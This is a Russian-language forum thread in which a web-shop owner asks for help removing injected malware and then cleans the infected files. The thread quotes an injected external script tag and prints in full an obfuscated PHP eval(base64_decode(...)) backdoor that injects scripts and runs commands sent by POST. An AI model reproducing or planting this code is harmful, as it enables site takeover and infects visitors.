Вживлен код - не могу найти пораженный файлик

[hablar 0]

Всем привет!

Гугл обнаружил на моем шопе вредоносный код, при просмотре кода страницы видно:

<script type="text/javascript" src="jscript/jscript_ajax.js"></script>

</head><script src=http://BAD-URL/haker.php ></script>

<body>

никак не могу найти, в каком файле удалить данный код. В /templates/vamshop/index.html, index.php, /includes/header.php его нет. Где можно еще посмотреть?

[support 447]

Может в /index.php, может в /includes/application_top.php

[Bububu 0]

А где на странице он появляется? Желательно увидеть эту страницу (HTML + URL).

[hablar 0]

Может в /index.php, может в /includes/application_top.php

там чисто..по крайней мере я не вижу

А где на странице он появляется? Желательно увидеть эту страницу (HTML + URL).

он есть на всех страницах в виде, как писал в начале темы.. сейчас отправлю в личку url, спасибо!

[support 447]

Можно ещё по дате изменений файлов на ftp найти, т.е. обычно в ftp клиенте видно, что все файлы одной даты, а изменённые другой.

[Midas 0]

Что-то зачастили сообщения о вирусах :(

[Bububu 0]

Субъективно.

[hablar 0]

Вести с полей:

сделал так: скопировал все файлы с хоста в локальную папку, адвансед файндером нашел все файлы с вхождением по адресу скрипта, почистил..код все равно остался, пошел дальше.. проверил файлы *.js, Они также оказались заражены, исправил все, код по прежнему сидит...))

[Bububu 0]

А исправленные файлы закачал обратно на сервер или они так и лежат локально?

[hablar 0]

закачал конечно))

еще вот что обнаружил в файле password_double_opt.php

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnbTRmMm4nKSl7ZnVuY3Rpb24gbTRmMm4oJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMM3B1WVd0dmJYTjBkbUV0YTNWeWMyc3VZMjh1WTJNdmQzQXRhVzVqYkhWa1pYTXZjblZ6YzJsaGJpNXdhSEFnUGp3dmMyTnlhWEIwUGc9PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMsMSk7ZWxzZWlmKHN0cnBvcygkcywnPGEnKSkkcz0kYS4kcztyZXR1cm4kczt9ZnVuY3Rpb24gbTRmMm4yKCRhLCRiLCRjLCRkKXtnbG9iYWwkbTRmMm4xOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRtNGYybjEpKWNhbGxfdXNlcl9mdW5jKCRtNGYybjEsJGEsJGIsJGMsJGQpO2ZvcmVhY2goQG9iX2dldF9zdGF0dXMoMSlhcyR2KWlmKCgkYT0kdlsnbmFtZSddKT09J200ZjJuJylyZXR1cm47ZWxzZWlmKCRhPT0nb2JfZ3poYW5kbGVyJylicmVhaztlbHNlJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgnbTRmMm4nKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kbTRmMm5sPSgoJGE9QHNldF9lcnJvcl9oYW5kbGVyKCdtNGYybjInKSkhPSdtNGYybjInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?><?php
[/code]
такого, насколько я понимаю, там быть не должно?

[support 447]

Не должно.

[hablar 0]

Не должно.

мдя, кто-то весело поработал с моим шопом, 38 файликов поражены еще такой фигней..сейчас почистим

[support 447]

Нужно ещё комп обязательно почистить от вирусов.

[hablar 0]

Нужно ещё комп обязательно почистить от вирусов.

Спасибо, VAM, сейчас займусь! 38 файлов подчистил, код ушел, и слава богу!

Спасибо Bububu за помощь в личке!